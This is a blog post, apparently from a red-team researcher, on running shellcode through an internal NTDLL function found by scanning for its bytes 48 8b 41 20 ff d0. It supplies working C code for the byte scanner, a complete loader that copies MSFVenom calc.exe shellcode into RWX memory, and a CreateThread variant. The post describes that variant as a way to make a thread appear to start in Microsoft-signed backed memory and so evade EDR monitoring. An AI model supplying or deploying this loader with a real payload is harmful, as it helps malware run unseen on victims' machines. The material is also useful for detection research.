Internal NTDLL Functions for Shellcode Execution

e-fin

29 Apr 2026 • 6 min read

Malware developers are always looking for new ways to execute shellcode. Commonly used Win32 APIs are often hooked or otherwise monitored by an EDR. A classic method that does not need a Win32 API to start execution is local execution through a function pointer cast, as shown below.

void *exec = VirtualAlloc(0, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, shellcodeSize);
((void(*)())exec)();

This method is still fairly reliable and under-appreciated. I have had great success using it to execute shellcode, as long as I avoid RWX memory (unlike the minimal example above).

I've been using Ghidra to look through NTDLL in an effort to find some new execution primitives. NTDLL has documented exports, undocumented exports, and internal "private" functions. Many of the exports are well studied and have public proofs of concept, so I wanted to know whether any internal, non-exported functions could be used to execute shellcode.

I found one notable internal function. Below are the first two assembly instructions of the function, as disassembled in Ghidra.

MOV        RAX, qword ptr [RCX + 0x20]
CALL       RAX

This is pretty straightforward. Under the Windows x64 calling convention, RCX holds the first argument passed to a function. Here RCX is used as a pointer: the 8-byte (qword) value at RCX + 32 bytes (0x20 in hex) is read and stored in RAX. RCX is therefore likely a pointer to a struct, and the value moved into RAX is a field 32 bytes into that struct. RAX is then called.

If we were to call this function from our own code, we would pass it a single argument: a pointer to a struct. The struct needs 32 bytes of "padding" followed by an 8-byte memory address pointing at our shellcode payload.

The struct layout we will use is below.

typedef struct _MY_STRUCT {
    BYTE padding[32];   
    PVOID pvShellcodeAddr;  
} MY_STRUCT, * PMY_STRUCT;

Before we can populate this struct and pass it to the function, we need the function's address. The function is not exported, so the standard "GetProcAddress" approach won't work. Instead, we have to build a custom version of "GetProcAddress" that walks through NTDLL and finds the address of this function.

This is pretty straightforward, since you can do it by modifying a custom implementation of GetModuleHandle. There are plenty of examples on GitHub of manually implementing GetModuleHandle by walking the NT headers. Our version still locates NTDLL, but instead of returning the DLL's base address, it walks through NTDLL's bytes looking for the function and returns the function's address.

The first thing we need to do is determine whether the bytes for the assembly code above are unique. The two instructions above assemble to the following bytes:

48 8b 41 20 ff d0

We can use Ghidra to search for those bytes. In the copy of NTDLL I examined there is only one instance, perfect!

Now that we have a unique sequence of bytes to search for, we can update our custom implementation of GetModuleHandle to search for those bytes, and return the address of those bytes rather than the address of NTDLL itself.

Below is the specific code that finds the bytes and returns the address. I won't be including my whole custom GetModuleHandle; any of the ones on GitHub can easily be modified with the code below to work.

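// pvBase must end up holding NTDLL's base address, as found by the custom GetModuleHandle walk
PVOID pvBase = pDte->InInitializationOrderLinks.Flink;

// check every offset where the full 6-byte pattern still fits inside the image
for (ULONG i = 0; i + 6 <= pDte->SizeOfImage; i++) {
    BYTE* p = (BYTE*)pvBase + i;
    // 48 8B 41 20 = mov rax, qword ptr [rcx+0x20]; FF D0 = call rax
    if (p[0] == 0x48 &&
        p[1] == 0x8B &&
        p[2] == 0x41 &&
        p[3] == 0x20 &&
        p[4] == 0xFF &&
        p[5] == 0xD0)
    {
        return p;  // address of the internal function's first instruction
    }
}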

Now that we can programmatically find the address of this internal function, we can call the function with our populated struct. In this example I'm using some MSFVenom shellcode to pop a calculator.


#include <Windows.h>
#include <stdio.h>
#include "structs.h"

PVOID GetInternalFunc1();

unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";


typedef struct _MY_STRUCT {
    BYTE padding[32];   
    PVOID pvShellcodeAddr;  
} MY_STRUCT, * PMY_STRUCT;

int main()
{
    DWORD dwSize = sizeof(buf);

    // allocate some memory for our shellcode
    PVOID pvAddr = VirtualAlloc(NULL,dwSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

    // copy the shellcode to our allocated region
    memcpy(pvAddr,buf, dwSize);

    // create an empty payload struct
    MY_STRUCT payload = {0}; 

    // place our shellcode address in the struct
    payload.pvShellcodeAddr = pvAddr;  

    // resolve the address of the internal func 
    PVOID UnFunc = GetInternalFunc1();

    // call the internal function with a pointer to the "payload" struct as its first argument (RCX)
    ((void(*)(PMY_STRUCT))UnFunc)(&payload);
}

I compiled it and it worked. Below is a video of the calculator shellcode executing.

The million dollar question...

Is this any more evasive or stealthy than local execution through a function pointer cast?

Probably not. It may even be less stealthy, because we have to walk the NT headers and scan NTDLL to find the internal function's address.

But is it cool and did I have fun? Absolutely.

There are also other potential use cases for this method of execution that could be more evasive. The first one that comes to mind is execution with CreateThread. Any decent EDR will monitor this API, specifically the address of the thread start routine. If CreateThread is executing unbacked memory, you're probably gonna have a bad time. Even if you use some type of stomping to place your shellcode payload in backed memory, the EDR will likely do a quick scan of that region and may detect the shellcode or other malicious signatures.

Using the internal function we found earlier, we can get CreateThread to execute our shellcode by using the internal function as a "trampoline" or "execute gadget" or whatever you want to call it. When calling CreateThread, we pass the address of the internal function as the thread start routine (lpStartAddress) and pass the struct pointer through lpParameter. This works because on x64 Windows the start routine receives lpParameter as its first argument, in RCX, which is exactly where the internal function expects the pointer to our struct.

HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  [in]            SIZE_T                  dwStackSize,
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,
  [in]            DWORD                   dwCreationFlags,
  [out, optional] LPDWORD                 lpThreadId
);

If an EDR analyzes the CreateThread call, it will see that the start routine lies within NTDLL and that NTDLL has not been modified. The thread therefore starts executing backed memory inside an unmodified, Microsoft-signed DLL. I can't find any information about EDRs analyzing the lpParameter argument, though I wouldn't be surprised if some do. Even if they do, they would have to parse the struct passed in lpParameter, identify any unbacked memory addresses in it, and analyze that unbacked region and/or determine that it will be executed. An added layer of stealth would be to put your shellcode in backed memory and pass that address within the payload struct.

Let's try it out and see if it works. Instead of calling the function directly, I passed it to CreateThread as shown below. The calculator shellcode ran successfully.

    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)UnFunc, &payload, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

Not out of the EDR woods yet...

Although CreateThread now starts execution in backed memory of a Microsoft-signed DLL, the start address does not appear in NTDLL's Export Address Table (EAT). A good EDR could flag this right away: applications are normally expected to call only exported functions, whereas the function we are executing should only ever be called internally from other locations within NTDLL.

I haven't done any significant testing of this technique against EDRs. Once I do, I may come back and update this post with my findings. For now, this is nothing more than a fun little experiment.